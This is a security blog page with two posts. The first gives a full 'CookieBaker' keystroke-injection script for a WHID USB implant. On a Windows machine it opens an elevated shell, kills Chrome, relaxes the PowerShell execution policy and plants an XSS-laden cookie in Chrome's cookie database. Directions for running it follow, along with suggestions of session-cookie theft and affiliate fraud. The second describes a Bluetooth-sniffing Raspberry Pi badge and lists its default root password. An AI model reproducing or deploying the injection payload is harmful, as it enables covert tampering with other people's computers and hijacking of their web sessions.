Tuesday, December 25, 2018

COOKIE BAKING: WHID-Injected Cookies

Baking up some holiday WHID-Injected Cookies...

Just in time for the holidays...LostRabbitLabs recently updated the cookie fuzzing tool "Anomalous Cookie" and rabbit-holed it's way into a new attack vector called "Cookie Baking".

What is Cookie Baking?
Cookie Baking is the technique of creating or modifying a cookie in a users' local Cookie Jar. This includes stuffing with malicious payloads, affiliate tags, fuzz-strings and more. Cookie Baking also provides a delivery method for targeting 'Self-XSS'  vulnerabilities, allowing them to be exploited.

Epic Holiday Cookie Baking...

If you would like to read more about 'Cookie Baking' and how it has been recently used, check out the blog "Epic Holiday Cookie Baking" at the Coalfire Labs website (link below):



Let's take the example XSS vulnerability discussed from "Epic Holiday Cookie Baking" and create a WHID Injector payload that can be used in our ingredients list.


MERRY CHRISTMAS from LostRabbitLabs...below you will find the full recipe for 'WHID-Injected Cookies'. >8-P


.-= WHID-Injected Cookies =-.

INGREDIENTS:
---------------------------------------------
  1.  1 x WHID-Injector (https://github.com/whid-injector/WHID)
  2.  1 x 'target' computer (in our 'case'...a Windows system)
  3.  1 x Vulnerable Cookie (using '_epicSID' from the example above)
  4.  1 x 'CookieBaker-WHID.txt' payload file (found below)

OPTIONAL:
      1 x WHID-Injector to Motherboard adapter (WI-to-MB) -  pictured below

NOTE: If you can 'Hide Yo' WHID' inside the 'target case', this will add persistence to your 'Cookie Baking'!

 
 


=============================================
=============================================

  'CookieBaker-WHID.txt'
  (save contents below to file - to be uploaded to your WHID Injector)

=============================================
=============================================

Delay
Delay
Delay
Press:131+114
PrintLine:powershell Start-Process cmd.exe -Verb runAs
Delay
Press:130+121
Delay
PrintLine:taskkill /im chrome.exe* /f
DelayPrintLine:powershell
Delay
PrintLine:Install-PackageProvider -Name NuGet -MinimumVersion 2.8.5.201 -Force
Delay
PrintLine:Install-Module PSSQLite -Force
Delay
PrintLine:set-executionpolicy remotesigned
Delay
PrintLine:Import-Module PSSQLite
Delay
PrintLine:$Database = "$env:LOCALAPPDATA\Google\Chrome\User Data\Default\Cookies"
Delay
PrintLine:$query = "INSERT INTO cookies
(creation_utc,host_key,name,value,path,expires_utc,is_secure,is_httponly,last_access_utc,has_expires,is_persistent,priority,encrypted_value,firstpartyonly) VALUES  ('13186874114525467','.epicgames.com','_epicSID','kpjak%3c%2fscript%3e%3cScRiPt%3ealert(1)%3c%2fScRiPt%3efbu5ubf6b6ce405264df19ea1394b58aba4d0','/','0','0','1','13386874114525467','0','1','0',NULL,'0')"
Delay
PrintLine:Invoke-SqliteQuery -DataSource $Database -Query $query
Delay
PrintLine:exit
Delay
PrintLine:exit

=============================================
=============================================

DIRECTIONS:
---------------------------------------------
  1. Plug 'WHID-Injector' into 'target' system
  2. Connect to WIFI network on pre-configured access-point of WHID-Injector
  3. Navigate to http://192.168.1.1 (or your custom pre-configured network


     4. Choose 'Upload Payload' and select our newly created 'CookieBaker-WHID.txt' file
     5. From the main menu choose 'Cookie-Baker-WHID.txt' from the payload list


     6. Click on 'Run Payload' button to run Cookie Baker on target system


    7. Target exploited. Eat carrots. The cookie payload above shows a Proof-of-concept XSS injection attack vector and payload but you will need to create the full working payload yourself! Will you steal session cookies, BeEF hook them or create a more clever client-side attack not yet seen?



Next Steps...


  1. Update 'Anomalous Cookie' as needed with better payloads/techniques
  2. Create Metasploit module for 'Cookie Baking' framework
  3. Catalog all known vulnerable cookies and create shared database
  4. Investigate 'Affiliate Fraud' possibilities




                                           ...and a Happy New Year!



Posted by at No comments:

Saturday, October 13, 2018

DERBYCON VIII: Bluetooth DeMystifier

How to make a wearable Raspberry Pi...

LostRabbitLabs created five (5) 'Bluetooth DeMystifiers' and brought them to DerbyCon to share. This page will serve as the howto and manual for those who have the badge and those who would like to build one. All parts needed to build one along with instructions on how to use will be listed below. If you would like a copy of the original SDCard image (RaspberryPI Wireless Zero) let me know and I will provide the link. Code will be posted to our Github soon.

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
What is a Bluetooth DeMystifier?
Using a Raspberry PI Zero Wireless tucked in a bag (making it a 'Hacky Sack' - thank you pancho for the great name)...it is a bluetooth enumerator, logger, identifier, sniffer, collector & plotter with ssh & web interfaces for admin access. With the DeMystifier you can...identify bluetooth/BLE devices around you, plot their signals over time providing real-time proximity data, and collect stats on Top Mac Addresses and Vendors observed. This can assist with locating lost devices, detecting if you are being followed, and give some insight into the Bluetooth Darknet that exists all around us.
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-

What you will need:
1. Raspberry PI Wireless Zero
2. Adafruit PiTFT 2.2" HAT Mini Kit - 320x240 2.2"
3. GPIO headers (for connecting PI to PiTFT)
4. Adafruit PowerBoost 1000C & one (1) on/off switch
5. 3.7v 2000mAh Lithium Ion Battery
6. One small leathery bag & Paracord


Back and front view of DeMystifier before it goes in the bag! Notice the four (4) buttons on the front below the screen!
Putting things together is pretty easy. Solder headers onto Raspberry Pi. Solder PiTFT to headers (leaving room for access to microUSB ports on the the PI). Connect power wires from Powerboost to Raspberry PI and attach battery. Slide in bag and loop paracord through bag ties. Leather-punky...and done!


How to use:
1. Charge battery (or use microUSB power while charging)
2. Turn on/off switch to ON position (located on back of badge)
3. Device boots up! You should see output and boot-up images (shown below) on the screen followed by the DerbyCon VIII splash screen (pictured above). Be patient and badge may take 1-2 minutes to boot up completely.


4. Using the four (4) buttons on the front of the badge, you can access different bluetooth data being collected/observed.

BUTTON 1:
Displays a graph of the Top 10 most observed Bluetooth Mac Addresses over time. This shows patterns in observed bluetooth traffic, devices and the people/objects who control them. Use for Red-Teaming, Blue-Teaming, Purple-Teaming, Asset management, and curiosity!





BUTTON 2:
Pressing this button will show statistics around total Mac Addresses, vendors and connections observed along with a listing of all devices observed in the last 60 seconds.



The Blueooth DeMystifier uses the open source software package 'Bluetoothctl' to provide some of the data seen in this view.






BUTTON 3:
This shows a real-time, enriched view (in the CSV format) of bluetooth/BLE signals observed complete with timestamp, vendor OUI lookup, and leaked strings.



BUTTON 4:
The Blueooth DeMystifier uses the open source software package 'hcitool' to provide some of the data seen in this view. It provides real-time BLE sniffing. Occasionally the command 'hcitool lescan' displays in I/O error message. Just press the button again...and wish for the best!




How to access the SSH and WEB interfaces:
In order to access the SSH and Web interfaces you will need to modify the existing 'wpa_supplicant.conf' file to use your own wireless network. This can be achieved by mounting the sdcard and modifying the the "/etc/wpa_supplicant/wpa_supplicant.conf" file.

wpa_supplicant.conf:
ctrl_interface=DIR=/var/run/wpa_supplicant GROUP=netdev
update_config=1

network={
 ssid="YOUR WIFI_SSID"
 psk="YOUR_WPA_KEY"
}

------------------------------------------------
Once your Bluetooth DeMystifier is online...you can log in to SSH by using the following methodology below.

SSH LOGIN:


1. Log in to Raspberry PI using the user 'pi2' and the password 'derbycon'
2. Gain root privileges using the command 'su -' and then using 'derbycon' as the password.
3. All data and important files are in '/home/pi/installs'.
4. Factory reset the DeMystifier (clearing out all bluetooth stats and starting over) by running '/home/pi/installs/clean.sh' and rebooting.

------------------------------------------------

WEB ACCESS:
The web interface for 'Bluetooth DeMystifier' provides additional graphs, logs, and ability to plot any Mac Address you request. Available data includes...

  • Bluetooth Stats - Macs, Vendors, Strings
  • All Discovered Devices (Name/Mac)
  • Discovered Devices Last 5 Minutes (Name/Mac)
  • CSV Version of Log Data
  • Top 10 MACADDRS - Last 10 Minutes
  • Top 10 MACADDRS - All-Time
.
Sample CSV output data shown below...

Use the '/home/pi/installs/tags.txt' file to create MAC-to-TAG translations as well as plot any Mac Address using the request URL below:

http://YOUR_IP_ADDRESS:1337/?macaddr=01:02:03:04:05:06

Thank you DerbyCon!
It was a great DerbyCon and I can't wait to go back next year. Great staff, family and local hospitality (not to mention the great food and drink). To many more!


Posted by at 2 comments:
Subscribe to: Posts (Atom)